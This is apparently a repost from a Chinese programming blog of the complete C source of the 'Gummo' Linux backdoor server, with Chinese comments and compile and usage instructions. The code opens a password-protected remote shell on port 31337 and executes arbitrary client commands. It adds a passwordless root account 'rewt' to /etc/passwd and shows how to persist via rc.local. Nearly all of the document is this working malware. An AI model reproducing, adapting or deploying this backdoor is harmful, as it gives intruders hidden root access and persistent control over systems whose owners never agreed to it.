2. 程式人生 > >linux 後門程序

linux 後門程序

阿新 發佈:2018-07-15
commands fgets mil error ror out \n 處理 door

/* /* Gummo 後門服務器 /* 編譯: cc server.c -o server /* 使用: ./server & /* echo /tmp/server & >> /etc/rc.d/rc.local */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <string.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/wait.h> #include <unistd.h> #define PORT 31337 #define BACKLOG 5 #define CMD_LOG "/tmp/.cmd" #define PASSWORD "password" /* global */ int newfd; void command (); void main () { int sockfd, sin_size, ss, len, bytes; struct sockaddr_in my_addr; struct sockaddr_in their_addr; char passwd[1024]; char *prompt = "Password: "; char *gp; //創建一個套節字 if ((sockfd = socket (AF_INET, SOCK_STREAM, 0)) == -1) { perror ("socket"); exit (1); } my_addr.sin_family = AF_INET; my_addr.sin_port = htons (PORT); my_addr.sin_addr.s_addr = INADDR_ANY; bzero (&(my_addr.sin_zero), 8); //綁定端口 if (bind (sockfd, (struct sockaddr *) &my_addr, sizeof (struct sockaddr)) == -1) { perror ("bind"); exit (1); } //接聽 if (listen (sockfd, BACKLOG) == -1) { perror ("listen"); exit (1); } while (1) { ss = sizeof (struct sockaddr_in); //一直接收著 返回新的套節字 if ((newfd = accept (sockfd, (struct sockaddr *) &their_addr, &sin_size)) == -1) { perror ("accept"); exit (1); } //創建一個進程 //子進程返回0 錯誤返回-1 父進程返回 pid if (fork ()) { ///////////////////父進程中///////////////////////// len = strlen (prompt); //往新的套節字裏發數據也就是往客服端發數據 bytes = send (newfd, prompt, len, 0); //接收客服端的數據也就是密碼 recv (newfd, passwd, 1024, 0); //判斷13首次出現位置 if ((gp = strchr (passwd, 13)) != NULL) *(gp) = ‘\0‘; //密碼正解 if (!strcmp (passwd, PASSWORD)) { //繼續發給客服端 send (newfd, "準許訪問, HEH\n", 21, 0); send (newfd, "\n\n\n\n\n\n歡迎來到Gummo後門服務器!\n\n", 41, 0); send (newfd, "Type ‘HELP‘ for a list of commands\n\n", 36, 0); //將處理所有發送的命令並將它們的輸出發送給客戶端 command (); } //密碼錯誤直接退出 else if (passwd != PASSWORD) { send (newfd, "Authentification Failed! =/\n", 29, 0); close (newfd); } } } } //處理客服端的命令 void command () { FILE *read; FILE *append; char cmd_dat[1024]; char *cmd_relay; char *clean_log; char buf[5000]; int dxm; while (1) { //先發送一個提示 send (newfd, "command:~# ", 11, 0); //等待接收 recv (newfd, cmd_dat, 1024, 0); cmd_dat[strlen (cmd_dat) - 2] = ‘\0‘; //判斷命令是否為空 if (strcmp (cmd_dat, "")) { //命令 HELP if ((strstr (cmd_dat, "HELP")) == cmd_dat) { //help send (newfd, "\n\n-=Help Menu=-\n", 16, 0); //quit send (newfd, "\nquit - to exit gummo backdoor\n", 31, 0); //rewt send (newfd, "rewt - automatically creates non passworded accnt ‘rewt‘ uid0\n", 63, 0); //wipeout send (newfd, "wipeout - this feature rm -rf /‘s a box. Inspired by dethcraze\n", 64, 0); } //quit if ((strstr (cmd_dat, "quit")) == cmd_dat) { close (newfd); } //rewt if ((strstr (cmd_dat, "rewt")) == cmd_dat) { system ("echo rewt::0:0::/:/bin/sh>>/etc/passwd;"); send (newfd, "User ‘rewt‘ added!\n", 19, 0); } //wipout if ((strstr (cmd_dat, "wipeout")) == cmd_dat) { send (newfd, "你嘗試使用這個命令是不行的, HEH!\n", 54, 0); close(newfd); exit(0); } else //搞一個臨時文件保存命令字符串 append = fopen (CMD_LOG, "w"); fprintf (append, "dextro\n"); fclose (append); //用於清理日誌 clean_log = (char *) malloc (420); sprintf (clean_log, "rm %s", CMD_LOG); system (clean_log); cmd_relay = (char *) malloc (1024); //用於輸出重定向 snprintf (cmd_relay, 1024, "%s > %s;\0", cmd_dat, CMD_LOG); system (cmd_relay); if ((read = fopen (CMD_LOG, "r")) == NULL) continue; while (!(feof (read))) { memset (buf, 0, 500); fgets (buf, 500, read); if (buf[0] == 0) break; write (newfd, buf, 500); } fclose (read); } } }

linux 後門程序

相關推薦

linux 後門程序

commands fgets mil error ror out \n 處理 door /* /* Gummo 後門服務器 /* 編譯: cc server.c -o server /* 使用: ./server & /* echo /tmp/s

Linux Shell 程序調試

linux shell 程序調試Linux Shell 程序調試 Shell程序的調試是通過運行程序時加入相關調試選項或在腳本程序中加入相關語句,讓shell程序在執行過程中顯示出一些可供參考的“調試信息”。當然,用戶也可以在shell程序中的適當位置加入一些echo命令用於調試與跟蹤。 方法一:在運行腳

雜記整理二:linux程序安裝

。。 for virtual cse nbsp rep 無法 device ebo ---恢復內容開始---debian下 Mysql手動刪除不幹凈,有殘留,無法更新安裝 先sudo apt-get purge mysql-server-5.5 卸載 再用 rm -rf /

使用RPM包工具和源碼包編譯安裝Linux應用程序

linux rpm 軟件包安裝 楊書凡 源碼包編譯安裝 系統命令:一般在/bin和/sbin目錄中,或為Shell內部指令,完成對系統的基本管理工作,例如IP配置工具應用程序:通常在/usr/bin和/usr/sbin目錄中,完成相對獨立的其他輔助任務,例如網頁瀏覽器Linux應用程序的組

[轉載]Linux後門整理合集(脈搏推薦)

整理 體系 子進程 目標 司機 nbsp 客戶 瀏覽器 -perm 我在思考要不要聯系下....都禁止轉載了.... 簡介 利用 Unix/Linux 自帶的 Bash 和 Crond 實現遠控功能,保持反彈上線到公網機器。 利用方法 先創建 /etc/xxxx

謝煙客---------Linux程序包管理yum使用和編譯安裝

linuxyum命令及倉庫創建與配置YUM 原理 安裝、卸載、查詢、升級、檢查,本地緩存、重裝、降級、歷史、獲取幫助倉庫 變量、事務、URL、開銷、鏡像、元數據存儲方式及組成createrepo作用、命令、lftp命令編譯安裝 目的 原理 開發工具及開發環境 編譯後的處理獲取程序包源代

Linux應用程序調用其他程序執行

pan 保存 執行 log spa blog 作用 csharp span 一、system 1、作用 在Linux應用程序中調用另一個程序; 2、用法 system("/sbin/ifconfig"); 二、popen 1、作用 調用另一個程序執行,同時保存執行的結果

[Linux應用]Linux應用程序輸出數據重定向到文件中

signal lin 原因 ... 直接 打印 http sig div 轉自:http://blog.chinaunix.net/uid-20680966-id-4698387.html 目的是要讓程序的printf的打印能重定向到某個文本中,ctrl+c強制退出後查看文

linux系統程序安裝(一)rpm工具

erl fields program 軟件 方法 owin lib 直接 源碼安裝 linux系統下程序安裝主要采用三種方式:1、rpm,有點類似.msi 和.exe比較類似,軟件包(相當於windows的某個程序的所有文件)的安裝路徑和文件名稱基本是固定的,但是他不會安裝

linux系統程序安裝(一)yum工具

sync 內容 sim lean provide for 就是 grep 大型 yum安裝工具類似appstore,運用yum工具可以方便的下載所需的程序,同時yum工具會自動檢查程序的依賴關系,並安裝相應的依賴包,有點像windows的某些大型軟件安裝程序會自動檢查幫你安

linux系統程序安裝(二)yum工具2-yum源管理

內容 centos 備份 hang clean 原生 yum 聯網 系統 繼續我們的yum工具應用之旅,yum工具之所以方便就是因為有方便的在線雲庫,實際工作中我們可能沒辦法鏈接互聯網,或者我們想安裝的程序原生源那麽我們能不能用其他方式應用方便的yum源呢? 一、使用光盤

linux系統程序安裝(三)源碼包安裝程序

efi ron 下載 示例 wget 問題 位置 提示 /usr 源碼包安裝是日常使用過程中最經常的安裝方式,比如nagios套件、apche等重要軟件都是源碼包方式安裝,源碼包編譯安裝技術是運維技術中比較重要的部分。 一、源碼包安裝位置 運維時,最好把要跑的業務包放到/u

linux程序JDBC連接不到mysql數據庫

var 進入 日誌 啟動報錯 span -- start -s 啟動mysql   今天在linux下部署一個 JavaEE項目的時候總是連接不到Mysql數據庫,檢查之後發現連接池的配置確定是對的,進入linux服務器之後以mysql -uname -ppassword連

請教一下linux程序重定向輸出到文...[模式及實現]

zcl inux log www. tar xxd html lin scm 56e3xa陌緣唾詠爍蹤http://blog.sina.com.cn/s/blog_17da0698f0102xdu0.html8vbt4y轎匣彩凸莆庇http://blog.sina.com.

ubuntu中的Linux安裝程序的方法

arc body AR figure HR 分析 不可 xxx all Ubuntu: 1.下載.deb文件,下載後,cd到.deb文件目錄,然後使用sudo dpkg -i xxx.deb dpkg=debian packager的縮寫 -i=install

linux centos程序後臺運行

linux centos程序後臺運行一、將程序放入後臺運行 1、在命令行後增加&符號,即可放入後臺,此時程序在後臺運行 2、在命令運行過程中,按下ctrl+z鍵,將程序放入後臺,此時程序在後臺是暫停的 二、查看後臺 程序 1、jobs -l 顯示結果中: [數字]:表示工作號,數字越大,表示放入

linux 驅動程序 HelloWorld

形式 lin \n 語法 rmmod release lsmod con 程序 Linux驅動可以直接編譯進內核,也可以以模塊的形式進行加載,前者比較復雜,本文就以模塊的形式加載! vi helloi_driver.c #include <linux/init.

Linux終端程序用c語言實現改變輸出的字的顏色

光標位置 高亮 AI 藍色 屬性 用c語言實現 TE c語言 說明 顏色代碼: 格式: echo "\033[字背景顏色;字體顏色m字符串\033[0m" 例如: echo "\033[41;36m something here \033[0m" 其中41的位置代表

linux rpm程序包管理器

man 功能 獲取 group eas 沒有 可行性 硬件 x86 在linux中的應用程序結構形式分為三種:1)源代碼形式2)二進制形式3)程序包形式其中源代碼是最權威的,二進制形式經過了一系列的編譯、匯編、連接等等其他操作得到可以執行的程序及其他相關的文件,而程序包形式

linux c程序內存泄漏檢測工具-mtrace工具介紹

std mac res AR urn %s \n 執行命令 check 筆者也是最近去面試被問到怎麽做內存泄漏檢查,之前都是靠人工屏蔽代碼、或者PC-link/KW一類的檢查工具進行檢查,回來後搜索了下,才知道linux自帶的就有mtrace工具。 具